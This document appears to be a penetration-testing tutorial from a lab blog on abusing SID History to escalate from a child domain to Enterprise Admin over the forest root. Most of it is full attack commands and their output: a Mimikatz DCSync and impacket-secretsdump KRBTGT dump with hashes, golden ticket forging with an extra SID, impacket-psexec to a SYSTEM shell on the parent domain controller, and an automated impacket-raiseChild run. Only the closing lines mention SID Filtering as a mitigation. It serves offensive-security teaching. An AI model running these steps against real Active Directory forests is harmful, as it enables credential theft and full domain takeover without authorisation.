Every user account in a Windows domain has an associated Security Identifier (SID). When a user logs into a domain, their SID value is included in a users access token. This value is used for identity based security decisions.
Active Directory supports a feature called SID History which allows a single user account to have multiple associated SID values. This feature can be used when migrating users from a legacy domain to a new domain, and ensure they can still access resources in both domains.
Manipulating SID history requires domain administrator privileges in a target domain. If an adversary is able to compromise a child domain within a forest, SID history can be manipulated to gain administrative control of a parent domain.
Trust Enumeration
nltest.exe can be used to enumerate domain trusts. In the below output, we can see that a trust exists between bordergate.local (the forest root) and child.bordergate.local, a child domain.
C:\Users\Administrator>nltest /domain_trusts
List of domain trusts:
0: BORDERGATE bordergate.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: CHILD child.bordergate.local (NT 5) (Forest: 0) (Primary Domain) (Native)
The command completed successfully
Domain trusts can also be enumerated using PowerShell;
Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : bordergate.local
ObjectClass : trustedDomain
ObjectGUID : 006fc34d-9cb6-4d0d-a7f8-6cdfe2fb9e33
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=child,DC=bordergate,DC=local
Target : bordergate.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
Exploiting SID History with Windows
Using a combination of PowerView and Mimikatz we can carry out a SID history attack using Windows. The following details need to be gathered;
- The FQDN’s of the child and parent domains
- The child and parent domain’s SID values
- The RC4 or AES hash of the child domain’s KRBTGT
FQDN Extraction with PowerView
PS C:\Users\Administrator\Desktop> . .\PowerView.ps1
PS C:\Users\Administrator\Desktop> Get-NetDomainTrust
SourceName : child.bordergate.local
TargetName : bordergate.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 27/01/2024 11:03:26
WhenChanged : 27/01/2024 11:03:26
PS C:\Users\Administrator\Desktop> Get-NetForestDomain
Forest : bordergate.local
DomainControllers : {DC01.bordergate.local}
Children : {child.bordergate.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC01.bordergate.local
RidRoleOwner : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name : bordergate.local
Forest : bordergate.local
DomainControllers : {CDC01.child.bordergate.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent : bordergate.local
PdcRoleOwner : CDC01.child.bordergate.local
RidRoleOwner : CDC01.child.bordergate.local
InfrastructureRoleOwner : CDC01.child.bordergate.local
Name : child.bordergate.local
Determining the Parent and Child Domain SID’s
PowerView’s Get-DomainSID can be used for this purpose.
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain child.bordergate.local
S-1-5-21-3282285589-3699175333-1759823265
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain bordergate.local
S-1-5-21-678665010-2561942565-514098031
KRBTGT Extraction with Mimikatz
We can extract the KRBTGT of the child domain using the following Mimikatz one liner.
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:CHILD\krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:CHILD\krbtgt
[DC] 'child.bordergate.local' will be the domain
[DC] 'CDC01.child.bordergate.local' will be the DC server
[DC] 'CHILD\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 27/01/2024 11:04:06
Object Security ID : S-1-5-21-3282285589-3699175333-1759823265-502
Object Relative ID : 502
Credentials:
Hash NTLM: b3a2319d94fe4aeae0f1fd5b017eed82
ntlm- 0: b3a2319d94fe4aeae0f1fd5b017eed82
lm - 0: 572c05076819c0d36b6d2e30b8b7f5b3
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 92aa3fc70fca259306071a788a8c48c2
mimikatz(commandline) # exit
Bye!
Carrying out the Attack
At this point, we have collected the following details;
Requirement | Value |
Parent domain FQDN | bordergate.local |
Child domain FQDN | child.bordergate.local |
Parent domain SID | S-1-5-21-678665010-2561942565-514098031 |
Child domain SID | S-1-5-21-3282285589-3699175333-1759823265 |
Child domain KRBTGT RC4 | b3a2319d94fe4aeae0f1fd5b017eed82 |
We will need to know the enterprise administrator SID, but since the RID is a well known value (519) we can just append with to the parent domain SID; S-1-5-21-678665010-2561942565-514098031-519
We then use Mimikatz to generate a golden ticket with the parent domain’s Enterprise Administrator SID as part of it’s SID history.
C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Access is denied.
C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt
User : Administrator
Domain : child.bordergate.local (CHILD)
SID : S-1-5-21-3282285589-3699175333-1759823265
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-678665010-2561942565-514098031-519 ;
ServiceKey: b3a2319d94fe4aeae0f1fd5b017eed82 - rc4_hmac_nt
Lifetime : 27/01/2024 14:26:25 ; 24/01/2034 14:26:25 ; 24/01/2034 14:26:25
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ child.bordergate.local' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Volume in drive \\DC01.bordergate.local\C$ has no label.
Volume Serial Number is 2CAB-3D22
Directory of \\DC01.bordergate.local\C$
08/05/2021 08:20 <DIR> PerfLogs
27/01/2024 09:30 <DIR> Program Files
08/05/2021 09:40 <DIR> Program Files (x86)
27/01/2024 09:23 <DIR> Users
27/01/2024 13:57 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 40,117,248,000 bytes free
Attacking with Linux
The same attack can also be launched from a Linux system;
Determining the Parent and Child Domain SID’s
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.205 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-678665010-2561942565-514098031
┌──(kali㉿kali)-[~/forest-trust-tools]
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.240 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3282285589-3699175333-1759823265
KRBTGT Extraction with Impacket-secretsdump
impacket-secretsdump CHILD/Alice:Password1@192.168.1.240 -just-dc-user CHILD/krbtgt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
krbtgt:aes128-cts-hmac-sha1-96:10270f335d0d6b548e1842ea0e6733c6
krbtgt:des-cbc-md5:0d640e94da8c4915
[*] Cleaning up...
Carrying out the Attack
┌──(kali㉿kali)-[~]
└─$ impacket-ticketer -nthash b3a2319d94fe4aeae0f1fd5b017eed82 -domain child.bordergate.local -domain-sid S-1-5-21-3282285589-3699175333-1759823265 -extra-sid S-1-5-21-678665010-2561942565-514098031-519 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.bordergate.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@CHILD.BORDERGATE.LOCAL
Valid starting Expires Service principal
27/01/24 15:02:23 24/01/34 15:02:23 krbtgt/CHILD.BORDERGATE.LOCAL@CHILD.BORDERGATE.LOCAL
renew until 24/01/34 15:02:23
┌──(kali㉿kali)-[~]
└─$ impacket-psexec CHILD.bordergate.local/Administrator@dc01.bordergate.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file pijDaCeK.exe
[*] Opening SVCManager on dc01.bordergate.local.....
[*] Creating service PYVP on dc01.bordergate.local.....
[*] Starting service PYVP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Note: When using impacket-psexec it’s import to use the Domain FQDN for the user or you will likely receive the following error: “[-] [Errno Connection error (CHILD:88)] [Errno -3] Temporary failure in name resolution”
Automated Exploitation
impacket-raiseChild is an impacket script that can be used to automatically gather the required details and gain command execution on the parent domain controller;
impacket-raiseChild -target-exec 192.168.1.205 child.bordergate.local/alice:'Password1'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Raising child domain child.bordergate.local
[*] Forest FQDN is: bordergate.local
[*] Raising child.bordergate.local to bordergate.local
[*] bordergate.local Enterprise Admin SID is: S-1-5-21-678665010-2561942565-514098031-519
[*] Getting credentials for child.bordergate.local
child.bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
child.bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
[*] Getting credentials for bordergate.local
bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48aae46c1e41eca204a6aa70a6aedd48:::
bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:2b52d519771b9b1266342151af0cc8e646d66d4a6baa59c2d443f4445b6acf0f
[*] Target User account name is Administrator
bordergate.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
bordergate.local/Administrator:aes256-cts-hmac-sha1-96s:bb9930dc9a2266e2491cdb468d6eb7441d87053fd483b8ff2473545fc71b3482
[*] Opening PSEXEC shell at DC01.bordergate.local
[*] Requesting shares on DC01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file qdrQNfow.exe
[*] Opening SVCManager on DC01.bordergate.local.....
[*] Creating service pWac on DC01.bordergate.local.....
[*] Starting service pWac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
DC01
C:\Windows\system32>whoami
nt authority\system
In Conclusion
Domains are not intended to be a security boundary, and there are numerous other ways to perform escalation from a child domain. Enabling a feature called “SID Filtering” would partly mitigate this attack. This prevents SID values from other domains being used.